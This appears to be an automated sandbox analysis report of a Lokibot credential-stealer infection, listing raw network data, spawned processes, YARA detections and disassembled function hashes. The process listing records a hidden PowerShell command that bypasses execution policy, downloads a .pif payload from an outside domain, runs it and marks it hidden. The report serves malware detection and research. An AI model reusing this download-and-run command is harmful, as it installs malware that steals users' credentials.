2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 08 48 d9 ad 65 d4 28 88 65 1e 57 f3 dd 1c 73 6c 75 a8 aa 41 84 16 2f a2 ba ea 93 bb 71 99 a8 44 81 37 c8 cc 9e f3 0c 14 8a 5a b8 ce c7 83 7f 96 c9 0a d7 aa e7 9d 4c e7 b9 b9 01 93 d9 8a f2 94 5a 4d 5d e9 ad 83 4c b9 3c f0 35 be 68 37 10 0b 12 f0 7d a4 c5 03 f7 5f a1 3d 89 0d 9b 53 0a 4f b7 a2 80 00 60 cd b1 2d 4a 9c fc fe ed ac 4f 1c 8c 4d a5 c5 08 cf 5c 53 b2 20 71 c9 57 b4 3a 73 81 a6 4d 7b 38 b2 d3 29 bb e8 86 20 5a e1 bc 43 8c 35 87 e3 92 44 b9 9a 14 84 31 bb 91 49 c7 48 73 a6 40 3a 02 c0 2f c1 8f 8a 35 61 50 6b bc a9 84 97 2b b9 f7 92 46 1f a7 f2 db a8 3e 64 04 03 85 a9 dd 38 4a 0d ef 17 16 fc e7 d4 5c 19 af b0 57 90 2f e3 fb 1c 65 30 8a b6 1b 61 7c 58 c4 5d 6b 57 d7 cd 78 10 e1 df d4 b2 f6 6f 2d 5c ee be 00 ea e7 27 0e 74 59 61 ba 4b 2b 34 70 44 0a Data Ascii: He(eWsluA/qD7ZLZM]L<5h7}_=SO`-JOM\S qW:sM{8) ZC5D1IHs@:/5aPk+F>d8J\W/e0a\|X]kWxo-\'tYaK+4pD
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: 65 73 75 94 dc 43 50 bc 8d 6c 52 58 99 90 9a cd e9 a0 c1 02 dc a7 af 08 be 17 7f 38 f0 c3 21 ec 49 14 01 64 9b 34 19 e1 d9 dc 17 e5 c3 0e 72 ed 32 e7 6b 0c b8 f8 0c 45 74 3e 87 88 03 f1 c9 1b 65 2b 8b 66 90 e4 08 ee 85 e4 8f b0 de d5 31 8a bf b4 87 f0 17 95 48 36 6b e8 5c 74 7d cb 0c e8 ea 01 af 3e fa e8 69 8b 98 04 0a ff 85 c6 ea 42 b2 0c 0c d1 1f 66 ea c9 0a 78 46 91 98 f2 49 63 5c 35 f0 d4 50 0f 10 3a 98 1a 02 be 20 d7 14 9b d4 1f c2 20 01 87 3c 51 e2 1f e6 34 84 a3 8d b2 13 6d 0b f3 5d d6 83 f8 28 58 41 d6 74 11 a3 27 a4 56 9b 7c 70 6c 68 1e dc 09 ff 31 48 2a 91 51 d1 1e 4c af 8b 5f 02 2f 5b ec 8e 49 9a 7c 11 bb 41 91 48 e2 23 52 e8 fc 24 34 a0 02 d9 0c 62 eb 86 4f 06 46 0f df 93 c3 b8 a5 28 e3 40 d0 eb af 6f c5 ef 7b ea ef 96 df 7b df 30 db 88 81 ac Data Ascii: esuCPlRX8!Id4r2kEt>e+f1H6k\t}>iBfxFIc\5P: <Q4m](XAt'V\|plh1H*QL_/[I\|AH#R$4bOF(@o{{0
2024-10-03 07:20:41 UTC	1369	IN	Data Raw: bf 94 ee f4 e7 68 ba 34 41 cf 72 22 27 ec 84 2f 53 6f 07 62 ea a2 34 28 d1 fa 74 ba 79 e0 64 7e ae d8 8c 96 cc a6 44 2a e1 36 e2 ba 57 55 5a f5 c4 55 6a 23 d9 ed ea 09 f9 55 ab 33 33 7d 4f e7 ae 33 04 46 38 db b2 e1 09 7e 7c 9d 27 ad 75 15 ca fc d9 31 33 97 ba ed c2 49 e0 73 7d d1 0c 7a 45 45 a7 ec 3d 2f e7 2c 97 4d 9c ce a9 d8 c5 27 d2 c1 b1 99 23 26 3e 93 70 e8 14 29 0c 64 c4 1c 47 65 c0 ef 4f 4e aa 89 82 80 02 a2 2a 21 74 df f8 2a ff 0f ff da 95 d8 3f 4d 84 98 16 f9 d7 ac 89 1d a8 33 ac b9 62 28 c7 9d 86 82 6d 42 ed 7d d7 9b b5 5d 73 22 1d 71 62 e0 2e 6c b4 91 d5 1a 00 15 ed 53 2e 7d 07 f4 22 79 c9 65 3e af f3 3d 14 9e 19 22 9d 3a df 32 5b be d9 d9 91 35 85 cb 03 d1 43 4a da 20 3f fa 53 f3 cd c3 2b 5c 51 ee f8 0c 47 74 17 48 51 db dd 8e 84 b2 c1 5f 16 Data Ascii: h4Ar"'/Sob4(tyd~D6WUZUj#U33}O3F8~\|'u13Is}zEE=/,M'#&>p)dGeON!t*?M3b(mB}]s"qb.lS.}"ye>=":2[5CJ ?S+\QGtHQ_

Target ID:	0
Start time:	03:20:34
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:20:34
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:20:42
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\screens.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\screens.pif"
Imagebase:	0xb00000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:20:43
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\screens.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\screens.pif
Imagebase:	0xda0000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:20:43
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\screens.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\screens.pif
Imagebase:	0x330000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	03:20:43
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\screens.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\screens.pif
Imagebase:	0x260000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	03:20:45
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80
Imagebase:	0x5a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:20:45
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80
Imagebase:	0x5a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF7C031667D Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

J_L;, xrefs: 00007FF7C03167B6

Memory Dump Source

Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd

Similarity

API ID:
String ID: J_L;
API String ID: 0-1607133157
Opcode ID: bf1eb2eb3b76272b84b384e9b4c3e8f8b1888b3da1ddab3200c08cbe643688fe
Instruction ID: 8a30de0c58f6f7a3a2681bb4b71cb4bcf156206aa9aae6e64645d9ab983d8139
Opcode Fuzzy Hash: bf1eb2eb3b76272b84b384e9b4c3e8f8b1888b3da1ddab3200c08cbe643688fe
Instruction Fuzzy Hash: BFD12461A0DBC64FE756AB7858651B5BFE4EF4B220B4801FFD089C71E3DA187845C3A2

Function 00007FF7C03171FD Relevance: 1.4, Instructions: 1403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23cd291a496b4e9f8b531e76ebbaf97299ee7c72406c030f05bcd8609a2dce81
Instruction ID: 81df86e64853f3dcd7b5227e12cfc30bdda7d9138df7c17f76a8b21ff48a1981
Opcode Fuzzy Hash: 23cd291a496b4e9f8b531e76ebbaf97299ee7c72406c030f05bcd8609a2dce81
Instruction Fuzzy Hash: E1C11322D0DAC64FE396AB3818195B5BFA0EF5A220B5C05FED049C72D3DE18790683A1

Function 00007FF7C0316757 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

J_L;, xrefs: 00007FF7C03167B6

Memory Dump Source

Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd

Similarity

API ID:
String ID: J_L;
API String ID: 0-1607133157
Opcode ID: 636ed7e7df0b335283048d8c5b82eb31db854163150cc038060c370cca0e34d9
Instruction ID: fa64e96ce1014a6f10d0098e8311583d9de9c6b3c47f8691e2336ff2758f5fe7
Opcode Fuzzy Hash: 636ed7e7df0b335283048d8c5b82eb31db854163150cc038060c370cca0e34d9
Instruction Fuzzy Hash: FB312632F1EA874FE799ABA804551B8B6C5EF49274B8401BDC45EC32D2DF18B84583A1

Function 00007FF7C0313135 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e7ffac07ad14a5087393babf6d0c3e9411b33b508ee84251eedbde235bfc0b
Instruction ID: 7c7ac89dd4463d6fd968e1f79093a5394f18b08671899944e89c2935f2f83a8f
Opcode Fuzzy Hash: a8e7ffac07ad14a5087393babf6d0c3e9411b33b508ee84251eedbde235bfc0b
Instruction Fuzzy Hash: 66D10631A0DAC94FE796EF2898555B9BBA0EF0A360B4805FED04DCB1D3DF14A805C3A1

Function 00007FF7C02433B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544762520.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0240000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: b59cfae338d122b582f3448533001b7876ddd0559532c6f5f6b6dbf3c5e56f9d
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 5201677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3651DB36E882CB45

Analysis Process: screens.pifPID: 2208, Parent PID: 7360COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.4%
Total number of Nodes:	321
Total number of Limit Nodes:	13

Executed Functions

Function 02D546C0 Relevance: 6.6, Strings: 5, Instructions: 302
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D|zJ, xrefs: 02D549DF
>,9$, xrefs: 02D54959
i4t:, xrefs: 02D5481B
>,9$, xrefs: 02D54952
D|zJ, xrefs: 02D549E6

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: >,9$$>,9$$D|zJ$D|zJ$i4t:
API String ID: 0-3823586563
Opcode ID: 35e4bc374531ed79ccea1ac581e84cdffca20e3c5b7c016784881ce4eea4c0f9
Instruction ID: f699f1b972c67f863b8b8960be0d0ad028a11650cc1b7918e4b399eeaba6f31e
Opcode Fuzzy Hash: 35e4bc374531ed79ccea1ac581e84cdffca20e3c5b7c016784881ce4eea4c0f9
Instruction Fuzzy Hash: D4D11574E0421ADFCB04CFA5D4849AEFBB2FF8A300B519559D816AB314D734EA82CF95

Function 0D0692BA Relevance: 4.1, Strings: 3, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[v[, xrefs: 0D0695DC
i,(, xrefs: 0D069394
qM$G, xrefs: 0D069720

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: i,($qM$G$[v[
API String ID: 0-2528883634
Opcode ID: c318621bd637c13616aa5d4a50531c9a3c7bcd4c4ea5fa6ae3f207e5dcd24554
Instruction ID: 2fa74dfd8b60c1fed9b40a6eaf14e08595a417ddf8043cc6d3b152acd974a370
Opcode Fuzzy Hash: c318621bd637c13616aa5d4a50531c9a3c7bcd4c4ea5fa6ae3f207e5dcd24554
Instruction Fuzzy Hash: 3ED14B70E1421ADFEB44CF95E4848AEFBB6FF89300B14C55AD41AAB654D334DA42CFA4

Function 0D0692E0 Relevance: 4.1, Strings: 3, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[v[, xrefs: 0D0695DC
i,(, xrefs: 0D069394
qM$G, xrefs: 0D069720

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: i,($qM$G$[v[
API String ID: 0-2528883634
Opcode ID: 99d7a7819f3f75a992910f38c28b3ecfdd4fb1b04dd50e6993dd019052853647
Instruction ID: f57eaa745d2d1e3722992a7e5bc67060ba9bca169fd557b27a8ecb5474a71244
Opcode Fuzzy Hash: 99d7a7819f3f75a992910f38c28b3ecfdd4fb1b04dd50e6993dd019052853647
Instruction Fuzzy Hash: 5FD12770E0421ADFDB44CF9AE4848AEFBB6FF89300B14C559D419AB654D734EA42CFA4

Function 02D545C0 Relevance: 2.9, Strings: 2, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i4t:, xrefs: 02D5481B
D|zJ, xrefs: 02D549E6

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: D|zJ$i4t:
API String ID: 0-2751561044
Opcode ID: 388e5ab919de4960a89083088ee00ca5f7e5105b51d28b830cab16d5803b948d
Instruction ID: 3b50d1a51bb5aba272ea368a4905298ba6697be875a875b4893098ad3c2a19d6
Opcode Fuzzy Hash: 388e5ab919de4960a89083088ee00ca5f7e5105b51d28b830cab16d5803b948d
Instruction Fuzzy Hash: 75F19BB4D0421ADFCB04CFA5D4855AEFBB2FF8A300B659559D846AB314C374EA82CF91

Function 02D5459F Relevance: 2.9, Strings: 2, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i4t:, xrefs: 02D5481B
D|zJ, xrefs: 02D549E6

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: D|zJ$i4t:
API String ID: 0-2751561044
Opcode ID: 44a07e90784553a3be5a1d09bfba34852f4c510e835cc0f30c33baf6b8d06710
Instruction ID: 90a66731825c7d12dd2920dda1be85652ae0fe83b78048193262bd0b6a71a402
Opcode Fuzzy Hash: 44a07e90784553a3be5a1d09bfba34852f4c510e835cc0f30c33baf6b8d06710
Instruction Fuzzy Hash: 57E19974E0421ADFCB04CFA5D4855AEFBB2FF8A300B159559D846AB314C374EA82CF91

Function 02D52439 Relevance: 2.7, Strings: 2, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 02D526EF
Teq, xrefs: 02D52541

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 9990f972359ec1d671816ef1e4bd39785fd93517670206528008b8179e4c5150
Instruction ID: c0a614b9a90fe6d5c00032e352a791a13bfa134a622fa8317e0dddefb310bb29
Opcode Fuzzy Hash: 9990f972359ec1d671816ef1e4bd39785fd93517670206528008b8179e4c5150
Instruction Fuzzy Hash: 6CA16970E042498FDB09CFA9C8946EEBFF2EF89310F188169C855AB355D775990ACF50

Function 0D06704A Relevance: 2.7, Strings: 2, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 0D0670F1
Teq, xrefs: 0D0672B6

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 16b5a79a32d082284e2684c1ed06887776c982aab3d1d89d62f76aff045e0251
Instruction ID: a9e289b572c9ab2285611da603bb59172f8d016f6c267f09c7ceede811ed23c0
Opcode Fuzzy Hash: 16b5a79a32d082284e2684c1ed06887776c982aab3d1d89d62f76aff045e0251
Instruction Fuzzy Hash: FC910874E042098FDB09CFA9C984ADEBBB2FF89300F24852AD519BB354D7759946CF60

Function 0D067088 Relevance: 2.7, Strings: 2, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 0D0670F1
Teq, xrefs: 0D0672B6

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: b2f2bd44e7af39743d1b31a3c67f8b720eaefdd8adb31f329fdb6713f6ec170b
Instruction ID: ac2e149d10288ba830961bdd27eb281a79e34e3e9c1382fddce5098ee4159a12
Opcode Fuzzy Hash: b2f2bd44e7af39743d1b31a3c67f8b720eaefdd8adb31f329fdb6713f6ec170b
Instruction Fuzzy Hash: B581C474E002198FDB08CFA9C984AAEFBB2FF88304F14942AD519BB354D7759945CF60

Function 02D524D8 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 02D526EF
Teq, xrefs: 02D52541

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 06d993bf137c51bc74dd7cc4cc4cb4d19cbeee43c19bbc5045d60c6be87ddf88
Instruction ID: 6ca00c046e8bef4b3d935ceaf4f4e57a3348b9ed1a955e80c260f785e07e8c08
Opcode Fuzzy Hash: 06d993bf137c51bc74dd7cc4cc4cb4d19cbeee43c19bbc5045d60c6be87ddf88
Instruction Fuzzy Hash: 8881C274E002599FDB48CFAAC894AAEFBB2FF89300F24852AD915AB354D7709945CF50

Function 02D5B5B8 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C<7#, xrefs: 02D5B696
C<7#, xrefs: 02D5B69D

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: C<7#$C<7#
API String ID: 0-2641965759
Opcode ID: 62cc6f6b43474fd08ccaa46015fb569e6da8b350b938104c1a4c54cc53a1f320
Instruction ID: 282b6523c3c5b8d39dd8c41792c00caa9557a0618076329d154d5bfec1147b81
Opcode Fuzzy Hash: 62cc6f6b43474fd08ccaa46015fb569e6da8b350b938104c1a4c54cc53a1f320
Instruction Fuzzy Hash: 8B612470D00269DFCF18DFA5D5886AEBBF1FB89304F10992AD812AB348D7B49A41CF50

Function 02D508E1 Relevance: 2.6, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.W_, xrefs: 02D50AA8
<, xrefs: 02D50A1A

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: <$.W_
API String ID: 0-718456861
Opcode ID: fd045b7866f610be3a3484c8ea1c4767b6ae07ab624094d4b0b439d2602f86bd
Instruction ID: a7e1f28bbfeeb285d3160d1db2d7bda84635bfc4d935e7c7dcaadf4d75a41c39
Opcode Fuzzy Hash: fd045b7866f610be3a3484c8ea1c4767b6ae07ab624094d4b0b439d2602f86bd
Instruction Fuzzy Hash: D3615375E00658CFDB58CFAAC9446DDBBF2AF88301F14C1AAD409AB364EB745A85CF50

Function 0ABECD1C Relevance: 1.9, APIs: 1, Instructions: 425
processCOMMON

Download Yara Rule

